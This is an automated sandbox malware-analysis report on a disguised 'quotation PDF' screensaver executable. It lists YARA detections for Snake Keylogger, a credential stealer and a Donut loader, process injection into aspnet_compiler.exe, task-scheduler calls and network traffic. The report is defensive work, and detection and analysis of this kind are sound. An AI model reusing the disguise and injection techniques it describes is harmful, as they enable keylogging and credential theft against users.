              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2

              System Summary

              barindex
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.2638636004.000001195F083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: Process Memory Space: aspnet_compiler.exe PID: 6176, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: aspnet_compiler.exe PID: 6176, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: initial sampleStatic PE information: Filename: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeCode function: 0_2_00007FF848F452FA0_2_00007FF848F452FA
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeCode function: 0_2_00007FF8491669120_2_00007FF849166912
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeCode function: 0_2_00007FF849165B660_2_00007FF849165B66
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeCode function: 0_2_00007FF849147B400_2_00007FF849147B40
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeCode function: 0_2_00007FF84915539D0_2_00007FF84915539D
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeCode function: 0_2_00007FF8491403D30_2_00007FF8491403D3
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeCode function: 0_2_00007FF849141DE10_2_00007FF849141DE1
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeCode function: 0_2_00007FF8491480290_2_00007FF849148029
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeCode function: 0_2_00007FF8491450410_2_00007FF849145041
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4_2_000001F59DD42D9C4_2_000001F59DD42D9C
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4_2_000001F59DD431784_2_000001F59DD43178
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4_2_000001F59DD435A84_2_000001F59DD435A8
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4_2_000001F59DD468544_2_000001F59DD46854
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4_2_000001F59DD41EC04_2_000001F59DD41EC0
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4_2_000001F59DD4405C4_2_000001F59DD4405C
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeStatic PE information: No import functions for PE file found
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EF9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000000.2061985330.000001195CD15000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJuolsuoza.exeH vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638577443.000001195EB30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EBB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EC01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2653112137.00000119774A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHkybbdm.dll" vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeBinary or memory string: OriginalFilenameJuolsuoza.exeH vs QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.aspnet_compiler.exe.1f59e080000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 4.2.aspnet_compiler.exe.1f5af9900e8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.2638636004.000001195F083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: Process Memory Space: aspnet_compiler.exe PID: 6176, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: aspnet_compiler.exe PID: 6176, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1195eb30000.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196ec01ab0.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@4/3
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2172:120:WilError_03
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FC6E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FC60000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FC9E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3322004150.000001F5AFA37000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FC50000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FCAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeReversingLabs: Detection: 18%
              Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe"
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeSection loaded: kernel.appcore.dllJump to behavior
